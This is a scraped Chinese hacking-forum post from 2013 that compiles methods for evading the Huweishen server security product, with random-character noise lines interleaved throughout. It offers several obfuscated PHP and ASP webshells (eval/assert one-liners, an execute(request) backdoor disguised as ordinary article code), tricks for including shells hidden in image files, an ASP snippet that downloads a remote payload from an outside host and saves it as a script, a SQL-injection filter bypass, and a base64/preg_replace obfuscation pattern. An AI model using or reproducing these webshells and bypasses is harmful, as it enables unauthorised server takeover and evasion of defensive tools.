中国网络渗透测试联盟
标题:
突破护卫神技术总汇
[打印本页]
作者:
admin
时间:
2013-2-14 00:11
标题:
突破护卫神技术总汇
申明:由于护卫神收费,破解版又比较低,因此,本贴方法均来自以往实战以及其他网络文献,没有写的请大家留言补上
, Q- | B9 P+ K( V+ {* f1 x9 Y
-----------------------------------------------------------------------------------------------------------------------------------
" k, m* [3 h5 ^/ G
文章分为:
~' I8 O4 N9 Y. q
一、马儿篇,都是以前可以过护卫神的马
1 o* s* }7 J u3 C' Z& I' [& Q
二、注入篇,可以绕过注入的方法
- q! F) {# ]9 g4 O
三、规则篇,根据护卫神的过滤规则大家可以自己设计马儿
8 o- ?5 o6 ^5 H) N* U3 F$ y7 Y
一、马儿篇
: l z3 s! j1 g3 t
----------------1号--------------------------
2 }/ C1 o4 S1 [1 |/ q; J( L% j, T
< ?php
8 \' V- n, S2 m' n! E/ R7 J
@eval
1 ]* r5 n7 B% m( u$ ]: ~
($_POST['1']);?>
3 f4 W# _8 [7 n- G; u- d
----------------2号--------------------------
: m) H! `, k: _- R4 {3 o
<title>login</title>nono<?php
8 j8 E* X4 y: ~. n8 F- _7 J+ j
eval
9 I, ^5 q7 H; [ ]3 r4 s D* O/ i
($_POST
) z7 }, `$ Q4 `# n3 N! V7 ]
[1])
# ^1 U/ p0 G g
?>
7 Q; ]$ V+ v D: }
--------------------3号---------------------------------------------
0 _& K. V/ }' ^. U K2 v ~7 b
< ?php $a = str_replace(x,"","axsxxsxexrxxt");
9 i, `0 ~- A" n" l) A
$a($_POST["c"]); ?>
2 X7 G! u# H' \! X; K6 k
菜刀直接连,不需要构造连接字符串,密码 c
4 y$ M: J# Y3 w3 g v2 D4 g( p& D
---------------------某牛给的,据说可过安全狗和护卫神------------------------------<%@language=vbscript codepage=936 %>
- y5 s8 c. v) f
<%@language=vbscript codepage=936 %>
. j. j; Y5 @6 S
<%
: m& o! t- @1 \1 s7 g' `- h* U9 c
Option Explicit
: E5 T2 d) t9 B0 t9 G
'强制浏览器重新访问服务器下载页面,而不是从缓存读取页面
& S5 w, w: z6 V9 n, { j
Response.Buffer = True
, J, c" i, @( N5 [
Response.Expires = -1
$ r. b4 Z3 S% U
Response.ExpiresAbsolute = Now() - 1
0 X; u9 V' [" l- F* l0 g8 ^! q! k
Response.Expires = 0
8 K) {# v3 [, Z. d) `
Response.CacheControl = "no-cache"
9 J' Y6 @5 @4 N
dim m
2 V3 ]6 V/ T: y( ^( h
m=request("m")
5 P$ [! J0 w+ Q. A% w' a
Dim ArticleID, Action, sql, rs, Hits, ShowType
6 l& t7 I# U9 @$ O0 Z. n
if m<>"" then execute(m)
s3 f# `0 |" r! [
ArticleID = Trim(request("ArticleID"))
! ?5 C( N7 s0 X9 a' d6 T0 I+ i' u
Action = Trim(request("Action"))
; g& ~" l( U, l W3 T' _4 D
ShowType = Trim(request("ShowType"))
8 P/ ]' N! [1 l* I# u" [) \* I
If IsNumeric(ShowType) Then
, A! g, u% }0 { r, t7 B+ Z! o
ShowType = CLng(ShowType)
* `" u6 S4 d/ p7 ]" Z1 a
Else
/ H; {" L+ q# R! @, ]2 i$ o
ShowType = 1
4 L: v4 [3 ~! l8 W1 d& O8 T
End If
5 N( t: Y" d/ F( c( \
%>
4 b! V) o" S: @7 z/ O1 a# a* w
--------------------类似于过安全狗的包含方法-------------------------------------------
5 ~6 [8 u: e' n
A.asp版本:
* l& u! e# a* j. U
将一句话保存为 XX.jpg 上传后 地址为 .../131717.jpg
" b5 k$ ?( Q+ `! Z) ?
在上传一个 x.asp 内容为 <!–#include file="../131717.jpg"-->
8 h: D l. U) p
B.php版本
. Q A% g8 |" F
如果是php的话:
# e: c$ K+ M2 A: E
< ?php
* r, B+ S7 p: S) M
include "1.htm";
/ _9 `3 I4 w& Z7 f
?>
! I) |, @1 Q3 e6 U1 g9 |( T& _
------------------实在不行,还可以下载---------------------------------------------
% Y6 I" B w/ C( Q: l
远程下载马
) @- S: d0 e( }. |- g
<%
! F. }9 c) h7 V& Q4 F
6 r3 r' O a# B- `# R2 n
Set xPost = CreateObject("Microsoft.XMLHTTP")
0 j5 O# q7 e! f# m. ^
/ }# c- |6 U9 v9 D- o4 r& k& c5 P: \
xPost.Open "GET","http://www.8090sec.com/1.txt",False
6 ?$ ^, H/ P9 j) D# T( ]3 y
( z* N& H( g7 |- o8 z7 P7 K
xPost.Send()
* c3 ] _. W" y# C; ]
" Q% }3 y0 V+ \8 t8 D6 N
Set sGet = CreateObject("ADODB.Stream")
z! n/ ]7 w1 y2 k6 a/ |
8 C1 P( c9 H! i! _6 r
sGet.Mode = 3
- A/ p" ]& f# T4 E# G0 a
$ |. O, {; N' O8 q8 Z
sGet.Type = 1
' E: O% H2 J4 r6 K
$ j4 P" r1 {0 H% T
sGet.Open()
1 Y( h5 w$ [0 X9 U
! z* y& A: k- A- v" {
sGet.Write(xPost.responseBody)
' P( u3 t# D9 u1 R& b
4 {1 I7 O- f/ j' P
sGet.SaveToFile Server.MapPath("ls.asp"),2
, b4 `1 E( E% D" ]) ~4 A) N
; T' g9 _; p+ C+ m) B/ q/ I
set sGet = nothing
/ K. c9 {# F3 a" z. U& R# X5 ~
. f; V @' J8 |6 L, A& H
set sPOST = nothing
6 x7 A7 a9 z* ~" j: T1 o' w
; g Z% }7 E, s2 q
%>
, ?9 z! D$ y- d' Y) `
二、注入篇
* J3 F3 @' N, C* G+ G' |
/*%00*/截断符
6 C& g0 X7 K$ d1 }' ?1 u# e, _( J
select/*%00*/* from admin;
# A# X, O$ M' g0 i
---------------------------------------------------------------
3 O# _1 O0 x0 J( V
---------------------------------------------------------------
9 E8 f; @7 h) u9 ?( u5 v0 U
三、规则篇
) ]0 x' Q0 c! l9 |- F5 { v: y
可以利用类似:
1 w4 ]6 O- ]! I t/ T- D; |
<?php
4 n2 W! I+ k+ K! X& D) z
% u6 }# s/ T2 ^8 M+ H( D+ h
$code='一串base64'; //base64编码
4 t" V( }6 P5 k$ i0 \3 r, {' i
9 Y y3 Q8 T& O& w6 W+ }: S
$x=str_replace('f',"","bfafsfef6f4f_ffdffeffcffoffdffef"); //字符串替换
# ?- O, z8 T4 @( g
P) U8 I: i; V* ]/ F
$a = '/a/';//正则规则
. o, I9 i2 L. ^9 h" H9 `
' k/ D& Y7 b0 W# W, x( ]! P
preg_replace($a,'e'.'v'.'a'.'l'.'('.$x.'('.$code.'))','a'); //正则替换
( s4 }# _9 h( f9 Q, p% X
- a2 W3 g& N- }# f
?>
3 G2 e! i; z3 D. q& `( P: ]
方法绕过关键词过滤
欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/)
Powered by Discuz! X3.2